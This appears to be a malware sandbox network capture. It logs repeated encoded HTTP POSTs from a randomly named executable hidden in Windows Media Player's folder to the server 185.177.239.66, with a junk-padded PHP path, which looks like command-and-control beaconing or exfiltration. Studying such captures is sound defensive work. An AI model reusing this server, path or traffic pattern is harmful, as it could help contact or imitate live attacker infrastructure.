  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2192
  Expect: 100-continue
Jan 8, 2025 18:08:55.530749083 CET | 2192 | OUT | Data Raw: 5c 5d 43 5e 5b 5e 57 5f 5e 5c 50 55 50 5a 5a 59 5a 5a 5b 59 54 57 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: \]C^[^W_^\PUPZZYZZ[YTWUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_)!32$^$&+=-'')/*.>&>6U.;3;9.Y#,Z!+
Jan 8, 2025 18:08:55.856637955 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:55.990760088 CET | 349 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 39 38 0d 0a 0f 12 3a 00 26 28 31 5d 20 06 08 57 2d 3e 20 5c 27 11 2d 5d 3e 56 30 04 2a 23 37 5a 28 05 38 59 3c 5d 25 5c 24 2c 2a 05 20 3c 22 01 21 3a 2c 5f 02 12 26 42 3f 32 34 56 29 59 37 1f 2a 37 26 07 20 0b 25 06 3f 33 22 51 23 29 3f 04 32 1d 3e 56 27 31 05 52 2a 3e 0d 5d 3b 07 31 12 21 39 21 50 0c 12 23 09 22 38 2b 0d 35 01 3d 15 28 01 35 07 32 0b 32 57 26 2a 2b 58 20 0a 20 0c 27 20 20 14 26 16 37 0d 25 2b 23 59 25 5f 2c 55 2e 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 98:&(1] W-> \'-]>V0*#7Z(8Y<]%\$,* <"!:,_&B?24V)Y7*7& %?3"Q#)?2>V'1R*>];1!9!P#"8+5=(522W&*+X ' &7%+#Y%_,U. S"-S0UQ0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50025 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:55.800228119 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2596
  Expect: 100-continue
Jan 8, 2025 18:08:56.162477016 CET | 2596 | OUT | Data Raw: 59 5d 43 5d 5e 59 57 5b 5e 5c 50 55 50 5d 5a 5f 5a 5b 5b 55 54 54 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: Y]C]^YW[^\PUP]Z_Z[[UTTUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]**$2<Z'50[=-X0-(R*T*&Q3-#3'--.Y#,Z!7
Jan 8, 2025 18:08:56.483486891 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:56.614466906 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:56 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50026 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:56.896548986 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2596
  Expect: 100-continue
Jan 8, 2025 18:08:57.260790110 CET | 2596 | OUT | Data Raw: 59 59 46 5e 5b 5e 57 5a 5e 5c 50 55 50 5c 5a 5d 5a 58 5b 5a 54 50 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: YYF^[^WZ^\PUP\Z]ZX[ZTPUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*!*%2$,Y)))['(T>?*>3-&T,?3<'.=.Y#,Z!3
Jan 8, 2025 18:08:57.600389004 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:57.738435984 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:57 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50027 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:57.888900042 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:08:58.253427982 CET | 2596 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:08:58.572508097 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:58.710448027 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 50028 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:59.775526047 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:00.163105965 CET | 2592 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:00.448724985 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:00.591456890 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 50029 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:00.785177946 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:01.166233063 CET | 2596 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:01.472929955 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:01.611773014 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 50030 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:01.017096043 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:01.374419928 CET | 2192 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:01.709126949 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:01.846863985 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: (raw chunked response body bytes omitted)


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 50031 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:02.700252056 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:03.049895048 CET | 2596 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:03.358908892 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:03.490603924 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 50032 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:04.681320906 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:05.035536051 CET | 2596 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:05.373123884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:05.506798983 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 50033 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:05.682055950 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:06.030735016 CET | 2592 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:06.344084024 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:06.684874058 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0
Jan 8, 2025 18:09:06.703893900 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 50034 | Destination IP: 185.177.239.66 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:06.848376989 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:07.202800989 CET | 2596 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:07.524365902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:07.656455040 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 50035 | Destination IP: 185.177.239.66 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:07.238653898 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:07.593512058 CET | 2192 | OUT | Data Raw: (raw request body bytes omitted)
Jan 8, 2025 18:09:07.929986954 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:08.062575102 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: (raw chunked response body bytes omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.4 | 50036 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:07.798317909 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:08.164318085 CET | 2596 | OUT | Data Raw: 5c 59 43 5d 5e 5f 52 5d 5e 5c 50 55 50 5e 5a 51 5a 53 5b 5b 54 52 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \YC]^_R]^\PUP^ZQZS[[TRUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>!5Y0"$'5/>9"'[8W)'*.>$6U,?$/,9.Y#,Z!
Jan 8, 2025 18:09:08.469192982 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:08.598748922 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.4 | 50037 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:08.772443056 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:09.162511110 CET | 2596 | OUT | Data Raw: 59 5d 43 59 5e 59 57 50 5e 5c 50 55 50 5f 5a 50 5a 5f 5b 5e 54 51 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y]CY^YWP^\PUP_ZPZ_[^TQU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_+2.%!(^06 >"'>7=+=!&-&9<''8..Y#,Z!?
Jan 8, 2025 18:09:09.454893112 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:09.586425066 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.4 | 50038 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:09.708439112 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:10.074676037 CET | 2596 | OUT | Data Raw: 5c 5f 43 5a 5e 5a 57 51 5e 5c 50 55 50 58 5a 5b 5a 52 5b 58 54 51 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \_CZ^ZWQ^\PUPXZ[ZR[XTQU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9+1&$ 3<>9X0=8U=?)>:&-%: X0//--.Y#,Z!#
Jan 8, 2025 18:09:10.372292042 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:10.502743959 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.4 | 50039 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:10.635338068 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:10.983937979 CET | 2592 | OUT | Data Raw: 59 5a 46 59 5b 5f 57 5d 5e 5c 50 55 50 59 5a 5c 5a 5d 5b 59 54 52 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
